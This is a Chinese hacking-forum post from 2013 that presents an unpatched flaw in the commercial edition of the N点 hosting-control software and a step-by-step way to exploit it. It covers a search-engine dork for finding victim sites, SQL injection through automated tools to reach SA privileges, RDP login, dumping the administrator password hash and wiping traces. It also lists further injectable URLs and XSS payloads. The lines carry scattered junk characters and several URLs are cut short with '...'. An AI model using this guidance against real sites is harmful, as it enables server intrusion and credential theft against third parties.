找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2326|回复: 0
打印 上一主题 下一主题

N点商业版漏洞通杀0day以及利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-3 08:06:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
不得不说N点实在是一个破东西
: F1 h) N. l! G6 P. K- c  }0 \就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
, r: N4 ?2 |! z" r* E好吧 抱怨一下就行了  接下来关键的时候到了0 y4 }5 n+ l( A5 ^8 i$ n
首先百度搜索关键字:inurl: (mmdatabase.asp)
6 [4 z- P  S) F5 R我随便列举一个:   www.xxxx.com
7 g. I/ b4 R5 `修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
6 f+ w8 b* M; t9 o# q扔入NBSI 或者啊D等各种傻逼工具后
" J+ h/ m8 d% I1 [2 m你们会看到是SA权限: I7 i/ a( M- m% k! n3 y( }2 ?, T0 A
果断3389 上去  hash得到administrator密码8 ~" t2 S) l- X7 `: F3 i
擦屁股走人~7 T' S( O: b0 I6 M
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
2 @0 ]' |! s0 g1 r" {1 h8 ]
4 [; i* o4 b0 g6 Z7 b5 G, P) K+ S再附上其他几个漏洞页面
  |6 Q, i; U. |8 ]4 @& pSQL:/ x7 `: `" C0 P, W
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
9 ?) y" R3 U+ j9 P6 V6 z. a% c- v; x+ phttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
$ y, Z4 B) S: G( phttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=94 O6 g) T" ~3 H' w# V' @: x
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
$ k7 T) c5 p+ H$ eXSS证明:
1 a0 \# P( X! R0 ?2 T) z9 R8 r  Jhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
- z7 ~1 U1 [. P; _0 w$ qhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
7 i, t% }+ U! E0 _! thttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
4 e3 d0 c& x. n4 f, X, m由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
( A  L6 B* `  r% l还是星外吧  你们懂的
- t; c" K; ~1 `; c作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?. g% e! h  o9 u$ }7 T3 p$ \$ P
PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉0 ]( v  T% s) j2 O3 M: c
——-
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表